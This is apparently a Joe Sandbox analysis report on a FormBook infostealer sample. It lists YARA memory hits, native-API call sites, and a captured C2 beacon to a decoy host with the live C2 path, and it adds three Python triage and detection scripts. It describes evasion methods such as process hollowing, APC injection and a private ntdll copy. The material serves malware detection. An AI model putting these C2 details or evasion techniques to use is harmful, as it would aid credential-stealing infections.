Source: powershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: Citvon.exe, 00000011.00000003.736694886.000000000083E000.00000004.00000001.sdmp, Citvon.exe, 00000014.00000003.752669738.00000000008D0000.00000004.00000001.sdmp | String found in binary or memory: https://xhtfga.dm.files.1drv.com/y4m8SMkzvpejvDLx8dnrECcyq_e2qmwA_A7cOWUQWdVRMq0yniUlzBSm_G1n5_On9Y_
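The C2 entry in the configuration is a host plus a URI path (www.clinics.life/qku9/), yet the only beacon the sandbox captured went to www.georgeswebwerks.com, one of the decoy domains, with that same /qku9/ path and no User-Agent header. That is how FormBook checks in: the same URI is requested from the real C2 and from decoy domains in turn, so a network rule keyed on the host alone misses most of the traffic while one keyed on the path catches it on every host. The script below is an added example, not part of the report: CONFIG is a hand-copied subset of the configuration shown above (the C2 entry and six of the decoy domains), REQUEST_FROM_REPORT is the GET request from the Networking section re-serialised by hand, the other requests are constructed controls, and the label names are this example's own.

```python
"""Match observed HTTP requests against the FormBook configuration in this report.

Added example; not part of the Joe Sandbox report. CONFIG is a subset of the
"Malware Configuration" above, REQUEST_FROM_REPORT is the request listed under
Networking re-serialised by hand, and the labels are this example's own.
"""
from urllib.parse import urlsplit

CONFIG = {
    "C2 list": ["www.clinics.life/qku9/"],
    "decoy": ["infinitilifecenters.com", "newsondogs.com", "georgeswebwerks.com",
              "openrank.site", "healthyred.xyz", "anixussohigh.com"],
}

# Constructed from the 'HTTP traffic detected' line in the report.
REQUEST_FROM_REPORT = (
    b"GET /qku9/?6lPDSJPH=4N2BxPNrndQhx4f7lxE8pKNuaIuSTDwEioPJ3Oup1sIb+BTUhD7Z9dt/VxNIQWQk9DQP&u8eTH=YdsPJP HTTP/1.1\r\n"
    b"Host: www.georgeswebwerks.com\r\n"
    b"Connection: close\r\n"
    b"\r\n"
)


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, target, lower-cased header dict)."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def strip_www(host: str) -> str:
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def c2_entries(config):
    """Yield (host, path) from 'C2 list' entries such as 'www.clinics.life/qku9/'."""
    for entry in config["C2 list"]:
        parts = urlsplit("http://" + entry)   # entries carry no scheme
        yield strip_www(parts.hostname), parts.path


def classify(method, target, headers, config=CONFIG) -> dict:
    host = strip_www(headers.get("host", ""))
    path = urlsplit(target).path              # query string dropped
    c2 = dict(c2_entries(config))
    decoys = {strip_www(d) for d in config["decoy"]}
    c2_paths = set(c2.values())
    if host in c2 and path == c2[host]:
        label = "c2_beacon"
    elif path in c2_paths and host in decoys:
        label = "c2_path_on_decoy_host"        # the request the sandbox saw
    elif path in c2_paths:
        label = "c2_path_unknown_host"         # a decoy missing from our copy of the config
    elif host in decoys:
        label = "decoy_host_other_path"        # ordinary visit to a (possibly legitimate) decoy domain
    else:
        label = "unrelated"
    return {
        "label": label,
        "method": method,
        "host": host,
        "path": path,
        # The report flags 'HTTP GET or POST without a user agent'.
        "no_user_agent": "user-agent" not in headers,
    }


def analyze(raw: bytes, config=CONFIG) -> dict:
    return classify(*parse_request(raw), config=config)


if __name__ == "__main__":
    print(analyze(REQUEST_FROM_REPORT))
```

Matching on the path alone fires on the decoy hosts too, which is intended: the decoys are contacted by the bot as camouflage, not by a user, so each such request is part of the same infection. The decoy_host_other_path label keeps genuine visits to those domains separate, since decoy lists are often made of unrelated live sites.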

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File sources: the same 14 memory dumps and 12 unpacked PEs listed under AV Detection above

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 25.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 25.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 27.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 27.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 25.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 25.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 27.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 27.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 27.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 27.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 27.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 27.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 25.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 25.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 25.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 25.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
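Reading the memory-scan hits above by hand is error-prone: every region is listed once per rule, and the process number is written in hex in the dump names (00000019) but in decimal in the unpacked-PE names (25.2.Citvon.exe). The Python below is an added example, not part of this Joe Sandbox report, that parses a handful of the lines above (copied verbatim, with a comma between the type and rule fields) and groups the hits by process and base address. It assumes the dump-name layout process.stage.dumpid.baseaddress.protection.type.sdmp; that layout is inferred from this report (0x19 == 25 and the 0x400000 base line up with the .unpack names) rather than documented here. The protection field is decoded with the standard Windows PAGE_* constants; the last field is left undecoded.

```python
"""Triage Joe Sandbox YARA memory-scan hits: parse the dump identifiers and
group the hits by process and region. Added example; not part of the report."""
import re
from collections import defaultdict

# Constructed sample: a subset of the "Matched rule" lines from this report, copied
# verbatim (a comma separates the type and rule fields; the regex accepts them fused too).
REPORT_LINES = [
    "Source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group",
    "Source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com",
    "Source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group",
    "Source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group",
    "Source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group",
    "Source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com",
    "Source: 25.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group",
]

# Standard Windows memory-protection constants (low byte of the protection field).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# ASSUMPTION: dump names are process.stage.dumpid.base.protection.type.sdmp, with the
# process number in hex. Inferred from this report (0x19 is the "25" of
# 25.2.Citvon.exe.400000.0.unpack, and the 0x400000 base matches). The last field is
# not decoded because its encoding is not documented on the page.
DUMP_RE = re.compile(
    r"Source: (?P<pid>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<mtype>[0-9A-Fa-f]{8})\.sdmp, "
    r"type: (?P<type>\w+),?\s*Matched rule: (?P<rule>.+?) Author: (?P<author>.+)$"
)
# Unpacked-PE names: decimal process.stage.image.base.index[.raw].unpack
UNPACK_RE = re.compile(
    r"Source: (?P<pid>\d+)\.(?P<stage>\d+)\.(?P<image>.+?)\.(?P<base>[0-9A-Fa-f]+)\.\d+\.(?:raw\.)?unpack, "
    r"type: (?P<type>\w+),?\s*Matched rule: (?P<rule>.+?) Author: (?P<author>.+)$"
)


def parse_hit(line):
    """Return a dict describing one YARA hit, or None if the line is not a hit."""
    m = DUMP_RE.match(line)
    if m:
        prot = int(m["prot"], 16)
        return {
            "pid": int(m["pid"], 16), "stage": int(m["stage"], 16), "base": int(m["base"], 16),
            "protection": PAGE_PROTECTION.get(prot & 0xFF, f"0x{prot:x}"),
            "kind": m["type"], "rule": m["rule"].strip(), "author": m["author"].strip(),
        }
    m = UNPACK_RE.match(line)
    if m:
        return {
            "pid": int(m["pid"]), "stage": int(m["stage"]), "base": int(m["base"], 16),
            "protection": None,  # a dumped PE carries no page-protection field
            "kind": m["type"], "rule": m["rule"].strip(), "author": m["author"].strip(),
        }
    return None


def summarize(lines):
    """Map (pid, base) -> set of rule descriptions that hit that region. A region hit by
    two independent rules (yara-signator and JPCERT/CC) is stronger evidence than one."""
    regions = defaultdict(set)
    for hit in map(parse_hit, lines):
        if hit:
            regions[(hit["pid"], hit["base"])].add(hit["rule"])
    return dict(regions)


def rwx_regions(lines):
    """Regions that were both executable and writable when dumped: where unpacked
    payload code normally lives, and the first place to carve for the C2 config."""
    return sorted({(h["pid"], h["base"]) for h in map(parse_hit, lines)
                   if h and h["protection"] == "PAGE_EXECUTE_READWRITE"})


if __name__ == "__main__":
    for (pid, base), rules in sorted(summarize(REPORT_LINES).items()):
        print(f"process {pid:>3}  base 0x{base:08x}  rules: {len(rules)}")
    print("RWX regions:", [(p, hex(b)) for p, b in rwx_regions(REPORT_LINES)])
```

Feed it the full list of hits from the report and the output is a short table of processes (3, 25, 27, 29, 32) and base addresses instead of 47 near-identical lines; the 0x400000 entries for processes 3, 25 and 27 are the hollowed images that the .unpack artifacts correspond to.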
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_004181B0 NtCreateFile,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00418260 NtReadFile,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_004182E0 NtClose,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00418390 NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_0041816A NtCreateFile,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_004181AA NtCreateFile,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00418203 NtCreateFile,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_004182DE NtClose,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_0041838C NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9860 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD96E0 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9660 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD98A0 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD98F0 NtReadVirtualMemory,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9820 NtEnumerateKey,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9840 NtDelayExecution,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00ADB040 NtSuspendThread,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD99A0 NtCreateSection,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD99D0 NtCreateProcessEx,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9910 NtAdjustPrivilegesToken,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9950 NtQueueApcThread,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9A80 NtOpenDirectoryObject,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9A20 NtResumeThread,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9A00 NtProtectVirtualMemory,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9A10 NtQuerySection,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9A50 NtCreateFile,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00ADA3B0 NtGetContextThread,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9B00 NtSetValueKey,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD95F0 NtQueryInformationFile,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD95D0 NtClose,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9520 NtWaitForSingleObject,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00ADAD30 NtSetContextThread,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9560 NtWriteFile,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9540 NtReadFile,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD96D0 NtCreateKey,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9610 NtEnumerateValueKey,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9670 NtQueryInformationProcess,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9650 NtQueryValueKey,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD97A0 NtUnmapViewOfSection,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9780 NtMapViewOfSection,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9FE0 NtCreateMutant,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9730 NtQueryVirtualMemory,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9710 NtQueryInformationToken,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00ADA710 NtOpenProcessToken,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9760 NtOpenProcess,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AD9770 NtSetInformationFile,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00ADA770 NtOpenThread,
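The native-API call sites above fall into two address ranges: 3_2_0041xxxx, inside the sample's own image at 0x400000, and 3_2_00AD9xxx, where the stubs are listed together with LdrInitializeThunk and where, further down, the report finds the string OriginalFilename ntdll.dll in process 3 at 0xB8F000. That pattern is consistent with the sample issuing system calls through its own copy of ntdll rather than the one user-mode hooks sit on, and it is the set of Nt* primitives, not any single call, that supports the report's hollowing, thread-context and APC signatures. The Python below is an added example, not part of this report, that parses a subset of these lines (copied verbatim) and checks which primitive sets are complete and in which address range they live. The technique-to-primitive mapping and the 64 KiB bucketing are this example's own heuristics, labelled as such in the code, not a Joe Sandbox rule.

```python
"""Classify sandbox-reported native-API call sites into the injection primitive sets
they form (hollowing, thread-context hijack, APC). Added example; not from the report."""
import re
from collections import defaultdict

# Constructed sample: "Code function" lines copied from this report (process 3, stage 2).
SRC = r"Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: "
CODE_FUNCTION_LINES = [
    SRC + "3_2_004181B0 NtCreateFile,",
    SRC + "3_2_00AD9660 NtAllocateVirtualMemory,LdrInitializeThunk,",
    SRC + "3_2_00AD98A0 NtWriteVirtualMemory,",
    SRC + "3_2_00ADB040 NtSuspendThread,",
    SRC + "3_2_00AD99A0 NtCreateSection,",
    SRC + "3_2_00AD99D0 NtCreateProcessEx,",
    SRC + "3_2_00AD9950 NtQueueApcThread,",
    SRC + "3_2_00AD9A20 NtResumeThread,",
    SRC + "3_2_00AD9A00 NtProtectVirtualMemory,",
    SRC + "3_2_00ADA3B0 NtGetContextThread,",
    SRC + "3_2_00ADAD30 NtSetContextThread,",
    SRC + "3_2_00AD97A0 NtUnmapViewOfSection,",
    SRC + "3_2_00AD9780 NtMapViewOfSection,",
    SRC + "3_2_00AD9760 NtOpenProcess,",
]

# Joe Sandbox call-site id: <process>_<stage>_<address> followed by the APIs called there.
# search() rather than match() so the fused "exeCode function:" form parses as well.
CALLSITE_RE = re.compile(
    r"Code function: (?P<pid>\d+)_(?P<stage>\d+)_(?P<addr>[0-9A-Fa-f]{8}) (?P<apis>[\w,]*)"
)

# HEURISTIC (this example's own, not the sandbox's): a technique is reported only when
# every primitive it needs has a call site. Names follow the report's signature wording.
TECHNIQUES = {
    "process hollowing": {"NtCreateProcessEx", "NtUnmapViewOfSection", "NtMapViewOfSection",
                          "NtWriteVirtualMemory", "NtResumeThread"},
    "thread context hijack": {"NtGetContextThread", "NtSetContextThread", "NtResumeThread"},
    "APC injection": {"NtQueueApcThread"},
    "remote memory write": {"NtOpenProcess", "NtAllocateVirtualMemory",
                            "NtWriteVirtualMemory", "NtProtectVirtualMemory"},
}


def parse_callsite(line):
    """Return {'pid', 'stage', 'addr', 'apis'} for one call-site line, or None."""
    m = CALLSITE_RE.search(line)
    if not m:
        return None
    apis = [a for a in m["apis"].split(",") if a]  # drop the trailing empty element
    return {"pid": int(m["pid"]), "stage": int(m["stage"]),
            "addr": int(m["addr"], 16), "apis": apis}


def injection_techniques(lines):
    """Names of the techniques whose full primitive set appears among the call sites."""
    seen = set()
    for site in map(parse_callsite, lines):
        if site:
            seen.update(a for a in site["apis"] if a.startswith("Nt"))
    return {name for name, needed in TECHNIQUES.items() if needed <= seen}


def group_by_region(lines, granularity=0x10000):
    """HEURISTIC: bucket call sites by 64 KiB region. Syscall stubs far from the 0x400000
    image (here 0xAD0000) point at code outside the sample's own PE, i.e. a second
    mapping of the syscall stubs; LdrInitializeThunk appearing next to them fits that."""
    buckets = defaultdict(list)
    for site in map(parse_callsite, lines):
        if site:
            buckets[site["addr"] & ~(granularity - 1)].extend(site["apis"])
    return dict(buckets)


if __name__ == "__main__":
    print("techniques:", sorted(injection_techniques(CODE_FUNCTION_LINES)))
    for region, apis in sorted(group_by_region(CODE_FUNCTION_LINES).items()):
        print(f"region 0x{region:08x}: {len(apis)} API references")
```

The four technique sets all come back complete for this sample, matching the report's "Sample uses process hollowing technique", "Modifies the context of a thread in another process" and "Queues an APC in another process" signatures; the same script run against a benign installer's call sites would normally return only the file and registry primitives and an empty technique set.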
        Source: C:\Windows\SysWOW64\cmd.exe, File created: C:\Windows  (directory name ends in a trailing space; it is not the real C:\Windows)
        Source: C:\Windows\SysWOW64\cmd.exe, File deleted: C:\Windows \System32
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_0041B846
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00401030
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_0041CA60
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00408C4B
